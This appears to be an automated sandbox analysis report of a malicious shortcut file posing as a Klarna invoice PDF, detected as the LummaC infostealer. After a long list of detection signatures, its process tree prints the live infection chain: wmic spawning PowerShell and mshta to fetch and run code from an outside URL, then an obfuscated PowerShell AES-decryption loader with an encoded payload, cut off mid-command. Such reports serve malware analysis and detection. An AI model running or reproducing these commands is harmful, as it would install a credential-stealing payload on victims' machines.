Windows Analysis Report
KlarnaInvoice229837.pdf.lnk
Overview
General Information
Detection
LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to create processes via WMI
Creates processes via WMI
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number, etc.) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- WMIC.exe (PID: 4348, cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend", MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- conhost.exe (PID: 3752, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5544, cmdline: powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 5428, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- mshta.exe (PID: 6960, cmdline: "C:\Windows\System32\mshta.exe" https://naubeautylus.ch/Headerfrontend, MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 1344, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD5827E2193AF83B13A9484213EC696E93EAD4E5C86D3B340D0383DF19D9C6B9177B473A715691E727DD59FAD481BB49CFEA164A8C8A2491D767B90BD1F1A11FC199A39158AB0C73865F35115CBBE29DBEC488B90B0DC061AD5039FE414583BD0E8BD4E7B7672D629DE366DBFAED2D2883ABA50A9A3E095A1B26777F10398DF92E050D286E806395A5648C371F95E62603829AB9CCCACC87BA02D01A00AFE9838ECF66997E0A551A83FFD859BBA6E2E568E9EDF081936A8569161CB274B3B9FC21427BBFF2D5D3CF500872D4A683668F2BA8C3038B93718EE8317DBCCA6305CD634DD1B2335210DC703C66A2F0B81A0128C9E257E324E61A18DA3ABFD1FF42A8E1E1E8F1E7A7E412839AAE35575C1AB8B6072F3F101F284610A7A9532CE85C597BD62A5F4DEB11490AF74CF21ECB396C3208FB1E2589B5CE209FFE1017BD9C5FAECDA99ACB77A243D50657551D5D47F459F8E119B10653DCCB3289C76C9277136D22F53A69199D62D4FFD4041CF72E1A171243BD2074D940A15228E8513CE7A56D65D8EC952DA1892A1C0DD32267424040F32729D596424618D14BC5778CA69A50F5378CE90DD67BF9999C530599FA84EEDF1437CAD4599F3B7A5E7C715AF39F96B02950C66C2C6BA86E0CA9B675D12FDB087692B5AAB0023D114DDA9F406E075D82EBF2F19297D6F614E17214DB113946B455BD69B36718F5E9FDD59B17F24ADE82623F8E02D3779A8A68B9AD01E429B87EFA6E75E2447F0911F56F9765C959A678DCB2037D736BE2BEBFAA18D5CD0E5D31518F484AA55F2B977C501125F80803041206588BADA41525EE9B8028EA58781C70961A6BB0694F09DA35A160ED1AE70FB8C2E6354A6F03BFC8C02611C83AD60917171564EB342465A947A75C12850F40B68C68DF9C5D83328A98798B17DBEA519B0CE39850F7D8E390584FED55BE5059CA71D2719A0D9B3575AD4DA7287E4D5C5F7EFBA6CC3A3F7F4BCD13AC1249B159691B69F1D64638B49A4BB7A28DA57B77892D7E8F00A1D56280ACF19657E31A66DFC23FBA50CFDA53B25280E96E1FBF839A922391F2D69B1839C422568935D9A35EB45649512E2FDFF02BB416951E3F123183CA94CCFCCB683F885C28A6612BE81855A88151A9D947C889DF4B8536261DCAAD58C911647AB6B0D09AAE2E7F0815EF1890124C736FB150D2551F0419A04AA7E0C0AA8A883CD43E6C794BCACCAFBDC6CEA95B925F072D8EC8D52F266541A22E74F87228F055F2EC79DE196F94BD5C59D029B1320B41AAF44D624365A3C1EC5F6B716D4A575948474E4552594C66474E';function cZF ($PgTDvwwB){return -split ($PgTDvwwB -replace '..', '0x$& ')};$kvsOmI = cZF($ddg.SubString(0, 2080));$qlR = [System.Security.Cryptography.Aes]::Create();$qlR.Key = cZF($ddg.SubString(2080));$qlR.IV = New-Object byte[] 16;$GluWYu